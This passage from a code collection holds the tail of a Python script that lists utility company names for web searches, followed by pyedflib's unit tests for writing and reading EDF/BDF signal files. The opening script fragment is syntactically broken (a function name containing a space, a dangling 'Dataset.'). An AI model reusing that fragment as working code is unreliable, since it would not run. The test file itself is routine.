def get_all_links_per_website(self):
print(self.names)
def get_all info(self):
print("")
def clear_and_print(self):
# Call these fuctions / objects
Names = ['Richland Energy Services', 'City of Covington - (GA)', 'Union City Energy Authority', 'Dickson Electric Systems', 'JEA', 'Mount Pleasant Power System', 'Scottsboro Electric Power Board', 'Fulton Electric System', 'Blue Ridge Mountain EMC', 'Midstate', 'West Kentucky RECC', 'Marshall-DeKalb EC', 'Memphis Light, Gas, & Water', 'Caney Fork EC', 'Humboldt Utilities', 'Holly Springs Electric Department', 'City of Madison', 'Hopkinsville Electric System', 'ACE Power', 'Ocala Utility Services', 'Bolivar Energy Authority', 'Lake Worth Beach Utilities', 'Wilson Energy', 'Kansas City BPU', 'Denton Municipal Electric', 'Southwest Tennessee EMC', 'Dixie Electric Coop', 'Orlando Utilities Commission', 'City of Blakely', 'Russellville Electric Plant Board', 'Benton County Electric System', 'City of Salem, MO', 'Lexington Electric System', 'City of New Bern', 'Tri-State', 'Columbia Power and Water Systems', 'Lenoir City Utilities Board', 'Dothan', 'Pickwick EC', 'Wilson Internet', 'Tombigbee EPA', 'Rockwood Electric Utility', 'Shelbyville Power System', 'Utilities Board of Tuskegee (UBT)', 'Clinton Utilities Board', 'Rush Shelby', 'Greenville Electric Utility System (GEUS)', 'Town of Selma', 'Cleveland Utilities', 'Mayfield Electric & Water Systems', 'Guntersville Electric Board', 'Ripley Power and Light Cpmpany', 'Albertville Municipal Utilities Board', 'Franklin EPB', 'Town of La Grange', 'City of Douglas', 'Town of Benson', 'St Croix EC', 'Glasgow EPB', 'City of Tarrant Electric Department', 'Tennessee Valley EC']
search_query = input("Type the search that you would like to perform(for example, type: 'Official utility website for '(should include space at the end)) : ")
Dataset = Dataset(Names, search_query)
Dataset.
"""
[per-file dataset columns: statistics for the scraping notebook above (avg_line_length 46.27, max_line_length 3,250, 1,129 lines, 52,285 bytes); next record: hexsha 71d408379d1902ee7db25498eb461f2ea32c8a1a, size 33,475, ext py, lang Python, path pyedflib/tests/test_edfwriter.py, repo Wellysis/pyedflib, repo head cfc8b728f4ae3bad94c2ff970a9b683b8ac3c67f, licenses ["BSD-2-Clause"], star/issue/fork counts null]
# -*- coding: utf-8 -*-
# Copyright (c) 2019 - 2020 Simon Kern
# Copyright (c) 2015 Holger Nahrstaedt
import os
import numpy as np
# from numpy.testing import (assert_raises, run_module_suite,
# assert_equal, assert_allclose, assert_almost_equal)
import unittest
import pyedflib
from datetime import datetime, date
class TestEdfWriter(unittest.TestCase):
@classmethod
def setUpClass(self):
data_dir = os.path.join(os.path.dirname(__file__), 'data')
self.bdfplus_data_file = os.path.join(data_dir, 'tmp_test_file_plus.bdf')
self.edfplus_data_file = os.path.join(data_dir, 'tmp_test_file_plus.edf')
self.bdf_data_file = os.path.join(data_dir, 'tmp_test_file.bdf')
self.edf_data_file = os.path.join(data_dir, 'tmp_test_file.edf')
self.data_dir = data_dir
tmpfiles = [f for f in os.listdir(data_dir) if f.startswith('tmp')]
for file in tmpfiles:
try:
os.remove(os.path.join(data_dir, file))
except Exception as e:
print(e)
def test_write_functions(self):
channel_info1 = {'label': 'label1', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 32767, 'physical_min': -32768,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'label2', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 32767, 'physical_min': -32768,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
# I'm not raising the errors immediately, but rather going through all tests and
# raising the error at the end if there was any.
# This makes it easier to find patterns of which functions fail in general.
error = False
print() # empty line for readability
# just looping through all write methods and see if they work
for file_type in [0, 1, 2, 3]:
filename = os.path.join(self.data_dir, 'tmp_write_{}.edf'.format(file_type))
with pyedflib.EdfWriter(filename, 2,
file_type=file_type) as f:
f.setSignalHeader(0, channel_info1)
f.setSignalHeader(1, channel_info2)
data = np.random.randint(-32768, 32767, 100)
for i in range(2):
res = f.writePhysicalSamples(data.astype(float))
if res<0:
print(res, 'Error for filetype {} on writePhysicalSamples signal {}'.format(file_type, i))
error = True
for i in range(2):
res = f.writeDigitalSamples(data.astype(np.int32))
if res<0:
print(res, 'Error for filetype {} on writeDigitalSamples signal {}'.format(file_type, i))
error = True
res = f.blockWritePhysicalSamples(np.hstack([data.astype(float)]*2))
if res<0:
print(res, 'Error for filetype {} on blockWritePhysicalSamples signal {}'.format(file_type, i))
error = True
res = f.blockWriteDigitalSamples(np.hstack([data.astype(np.int32)]*2))
if res<0:
print(res, 'Error for filetype {} on blockWriteDigitalSamples signal {}'.format(file_type, i))
error = True
with pyedflib.EdfReader(filename) as f:
data1 = f.readSignal(0)
data2 = f.readSignal(1)
try:
np.testing.assert_array_almost_equal(data1, data2)
self.assertEqual(data1.sum(), data.sum()*4, 'data written is not equal to data read')
self.assertEqual(len(data1), 400, "didn't write 400 samples")
except Exception as e:
print(e)
error=True
if error:
raise IOError('Write tests were not successful, see log for details')
def test_subsecond_starttime(self):
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
startdate = datetime(2017, 1, 2, 13, 14, 15, 250)
header = {'technician': 'tec1', 'recording_additional': 'recAdd1', 'patientname': 'pat1',
'patient_additional': 'patAdd1', 'patientcode': 'code1', 'equipment': 'eq1',
'admincode':'admin1','gender':1,'startdate':startdate,'birthdate':date(1951, 8, 2)}
f.setHeader(header)
f.setStartdatetime(startdate)
f.setSignalHeader(0, channel_info)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
startdate2 = f.getStartdatetime()
assert startdate2==startdate, 'write {} != read {}'.format(startdate, startdate2)
del f
def test_subsecond_annotation(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23456, 0.2222, u"annotation1_ä")
f.writeAnnotation(0.2567, -1, u"annotation2_ü")
f.writeAnnotation(1.2567, 0, u"annotation3_ö")
f.writeAnnotation(1.3067, -1, u"annotation4_ß")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.2345, decimal=4)
np.testing.assert_almost_equal(ann_duration[0], 0.2222, decimal=4)
np.testing.assert_equal(ann_text[0], "annotation1_..")
np.testing.assert_almost_equal(ann_time[1], 0.2567, decimal=4)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "annotation2_..")
np.testing.assert_almost_equal(ann_time[2], 1.2567, decimal=4)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "annotation3_..")
np.testing.assert_almost_equal(ann_time[3], 1.3067, decimal=4)
np.testing.assert_almost_equal(ann_duration[3], -1)
np.testing.assert_equal(ann_text[3], "annotation4_..")
def test_EdfWriter_BDFplus(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
f.setTechnician('tec1')
f.setRecordingAdditional('recAdd1')
f.setPatientName('pat1')
f.setPatientCode('code1')
f.setPatientAdditional('patAdd1')
f.setAdmincode('admin1')
f.setEquipment('eq1')
f.setGender(1)
f.setBirthdate(date(1951, 8, 2))
f.setStartdatetime(datetime(2017, 1, 1, 1, 1, 1))
f.setSamplefrequency(1,200)
f.setPhysicalMaximum(1,2)
f.setPhysicalMinimum(1,-2)
f.setLabel(1,'test 2')
f.setPhysicalDimension(1,'l2')
f.setTransducer(1,'trans2')
f.setPrefilter(1,'pre2')
data1 = np.ones(100) * 0.1
data2 = np.ones(200) * 0.2
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'pat1')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
np.testing.assert_equal(f.getLabel(1), 'test 2')
np.testing.assert_equal(f.getPhysicalDimension(1), 'l2')
np.testing.assert_equal(f.getPrefilter(1), 'pre2')
np.testing.assert_equal(f.getTransducer(1), 'trans2')
np.testing.assert_equal(f.getSampleFrequency(1), 200)
np.testing.assert_equal(f.getPhysicalMaximum(1), 2)
np.testing.assert_equal(f.getPhysicalMinimum(1), -2)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
def test_EdfWriter_BDFplus2(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
f.setTechnician('tec1')
f.setRecordingAdditional('recAdd1')
f.setPatientName('empty')
f.setPatientCode('code1')
f.setPatientAdditional('patAdd1')
f.setAdmincode('admin1')
f.setEquipment('eq1')
f.setGender("Male")
f.setBirthdate(date(1951, 8, 2))
f.setStartdatetime(datetime(2017, 1, 1, 1, 1, 1))
f.setSamplefrequency(1,100)
f.setPhysicalMaximum(1,2)
f.setPhysicalMinimum(1,-2)
data1 = np.ones(100) * 0.1
data2 = np.ones(100) * 0.2
f.writePhysicalSamples(data1)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data2)
f.writePhysicalSamples(data1)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'empty')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
x01 = f.readSignal(0,000,100)
x02 = f.readSignal(0,100,100)
x11 = f.readSignal(1,000,100)
x12 = f.readSignal(1,100,100)
np.testing.assert_almost_equal(np.sum(np.abs(x01-data1)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x02-data2)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x11-data2)),0,decimal=4)
np.testing.assert_almost_equal(np.sum(np.abs(x12-data1)),0,decimal=4)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
def test_EdfWriter_BDF(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdf_data_file, 2,
file_type=pyedflib.FILETYPE_BDF)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
del f
f = pyedflib.EdfReader(self.bdf_data_file)
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDF)
del f
def test_EdfWriter_EDFplus(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
header = {'technician': 'tec1', 'recording_additional': 'recAdd1', 'patientname': 'pat1',
'patient_additional': 'patAdd1', 'patientcode': 'code1', 'equipment': 'eq1',
'admincode':'admin1','gender':1,'startdate':datetime(2017, 1, 1, 1, 1, 1),'birthdate':date(1951, 8, 2)}
f.setHeader(header)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
np.testing.assert_equal(f.getTechnician(), 'tec1')
np.testing.assert_equal(f.getRecordingAdditional(), 'recAdd1')
np.testing.assert_equal(f.getPatientName(), 'pat1')
np.testing.assert_equal(f.getPatientCode(), 'code1')
np.testing.assert_equal(f.getEquipment(), 'eq1')
np.testing.assert_equal(f.getPatientAdditional(), 'patAdd1')
np.testing.assert_equal(f.getAdmincode(), 'admin1')
np.testing.assert_equal(f.getGender(), 'Male')
np.testing.assert_equal(f.getBirthdate(), '02 aug 1951')
np.testing.assert_equal(f.getStartdatetime(), datetime(2017, 1, 1, 1, 1, 1))
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
def test_EdfWriter_EDF(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.edf_data_file, 2,
file_type=pyedflib.FILETYPE_EDF)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
assert f.writePhysicalSamples(data)==0, 'error while writing physical sample'
del f
f = pyedflib.EdfReader(self.edf_data_file)
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDF)
del f
def test_SampleWriting(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
f.close()
f = pyedflib.EdfReader(self.bdfplus_data_file)
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
f._close()  # without the parentheses the method is never actually called
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
def test_EdfWriter_EDF_contextmanager(self):
channel_info1 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
channel_info2 = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 32767, 'digital_min': -32768,
'prefilter': 'pre1', 'transducer': 'trans1'}
with pyedflib.EdfWriter(self.edf_data_file, 2, file_type=pyedflib.FILETYPE_EDF) as f:
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
with pyedflib.EdfReader(self.edf_data_file) as f:
np.testing.assert_equal(f.getLabel(0), 'test_label')
np.testing.assert_equal(f.getPhysicalDimension(0), 'mV')
np.testing.assert_equal(f.getPrefilter(0), 'pre1')
np.testing.assert_equal(f.getTransducer(0), 'trans1')
np.testing.assert_equal(f.getSampleFrequency(0), 100)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDF)
def test_SampleWritingContextManager(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
with pyedflib.EdfWriter(self.bdfplus_data_file, 2, file_type=pyedflib.FILETYPE_BDFPLUS) as f:
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
with pyedflib.EdfReader(self.bdfplus_data_file) as f:
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
with pyedflib.EdfReader(self.bdfplus_data_file) as f:
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
def test_SampleWriting2(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':8388607,'digital_min':-8388608,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 2,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.ones(500) * 0.1
data2 = np.ones(500) * 0.2
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
data1_read = f.readSignal(0)
data2_read = f.readSignal(1)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
def test_SampleWriting_digital(self):
dmin, dmax = [0, 1024]
pmin, pmax = [0, 1.0]
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':pmax,'physical_min':pmin,
'digital_max':dmax,'digital_min':dmin,
'prefilter':'pre1','transducer':'trans1'}
channel_info2 = {'label':'test_label2', 'dimension':'mV', 'sample_rate':100,
'physical_max':pmax,'physical_min':pmin,
'digital_max':dmax,'digital_min':dmin,
'prefilter':'pre2','transducer':'trans2'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 2,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.arange(500, dtype=float)  # np.float was removed from NumPy; the builtin float is equivalent
data2 = np.arange(500, dtype=float)
data_list = []
data_list.append(data1)
data_list.append(data2)
with np.testing.assert_raises(TypeError):
f.writeSamples(data_list, digital=True)
f.close()
del f
f = pyedflib.EdfWriter(self.edfplus_data_file, 2,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
f.setSignalHeader(1,channel_info2)
data1 = np.arange(500, dtype=np.int32)
data2 = np.arange(500, dtype=np.int32)
data_list = []
data_list.append(data1)
data_list.append(data2)
f.writeSamples(data_list, digital=True)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data1_read = (f.readSignal(0) - pmin)/((pmax-pmin)/(dmax-dmin)) # converting back to digital
data2_read = (f.readSignal(1) - pmin)/((pmax-pmin)/(dmax-dmin)) # converting back to digital
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_equal(len(data2), len(data2_read))
np.testing.assert_almost_equal(data1, data1_read)
np.testing.assert_almost_equal(data2, data2_read)
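# The two "converting back to digital" lines above invert the writer's scaling.
# For reference, the usual EDF linear mapping (plain arithmetic, no pyedflib
# needed; the test can skip the dmin offset only because dmin and pmin are both
# zero-based here):
#
#   physical = (digital - dmin) * (pmax - pmin) / (dmax - dmin) + pmin
#   digital  = (physical - pmin) * (dmax - dmin) / (pmax - pmin) + dmin
#
# e.g. with dmin, dmax = 0, 1024 and pmin, pmax = 0.0, 1.0:
# digital 512 -> physical 0.5 -> recovered digital 512.0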
def test_TestRoundingEDF(self):
channel_info1 = {'label':'test_label1', 'dimension':'mV', 'sample_rate':100,
'physical_max':1.0,'physical_min':-1.0,
'digital_max':32767,'digital_min':-32768,
'prefilter':'pre1','transducer':'trans1'}
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
time = np.linspace(0,5,500)
data1 = np.sin(2*np.pi*1*time)
data_list = []
data_list.append(data1)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data1_read = f.readSignal(0)
del f
np.testing.assert_equal(len(data1), len(data1_read))
np.testing.assert_almost_equal(data1, data1_read,decimal=4)
f = pyedflib.EdfWriter(self.edfplus_data_file, 1,
file_type=pyedflib.FILETYPE_EDFPLUS)
f.setSignalHeader(0,channel_info1)
data_list = []
data_list.append(data1_read)
f.writeSamples(data_list)
del f
f = pyedflib.EdfReader(self.edfplus_data_file)
data2_read = f.readSignal(0)
self.assertEqual(f.filetype, pyedflib.FILETYPE_EDFPLUS)
del f
np.testing.assert_equal(len(data1), len(data2_read))
np.testing.assert_almost_equal(data1, data2_read,decimal=4)
np.testing.assert_almost_equal(data1_read, data2_read, decimal=4)
def test_AnnotationWriting(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': 'pre1', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, u"annotation1_ä")
f.writeAnnotation(0.25, -1, u"annotation2_ü")
f.writeAnnotation(1.25, 0, u"annotation3_ö")
f.writeAnnotation(1.30, -1, u"annotation4_ß")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
np.testing.assert_equal(ann_text[0], "annotation1_..")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "annotation2_..")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "annotation3_..")
np.testing.assert_almost_equal(ann_time[3], 1.30)
np.testing.assert_almost_equal(ann_duration[3], -1)
np.testing.assert_equal(ann_text[3], "annotation4_..")
def test_AnnotationWritingUTF8(self):
channel_info = {'label': 'test_label', 'dimension': 'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': u'test', 'transducer': 'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, u"Zähne")
f.writeAnnotation(0.25, -1, u"Fuß")
f.writeAnnotation(1.25, 0, u"abc")
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
np.testing.assert_equal(ann_text[0], "Z..hne")
np.testing.assert_almost_equal(ann_time[1], 0.25)
np.testing.assert_almost_equal(ann_duration[1], -1)
np.testing.assert_equal(ann_text[1], "Fu..")
np.testing.assert_almost_equal(ann_time[2], 1.25)
np.testing.assert_almost_equal(ann_duration[2], 0)
np.testing.assert_equal(ann_text[2], "abc")
def test_BytesChars(self):
channel_info = {'label': b'test_label', 'dimension': b'mV', 'sample_rate': 100,
'physical_max': 1.0, 'physical_min': -1.0,
'digital_max': 8388607, 'digital_min': -8388608,
'prefilter': b' ', 'transducer': b'trans1'}
f = pyedflib.EdfWriter(self.bdfplus_data_file, 1,
file_type=pyedflib.FILETYPE_BDFPLUS)
f.setSignalHeader(0,channel_info)
data = np.ones(100) * 0.1
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writePhysicalSamples(data)
f.writeAnnotation(1.23, 0.2, b'Zaehne')
f.writeAnnotation(0.25, -1, b'Fuss')
f.writeAnnotation(1.25, 0, b'abc')
del f
f = pyedflib.EdfReader(self.bdfplus_data_file)
self.assertEqual(f.filetype, pyedflib.FILETYPE_BDFPLUS)
ann_time, ann_duration, ann_text = f.readAnnotations()
del f
np.testing.assert_almost_equal(ann_time[0], 1.23)
np.testing.assert_almost_equal(ann_duration[0], 0.2)
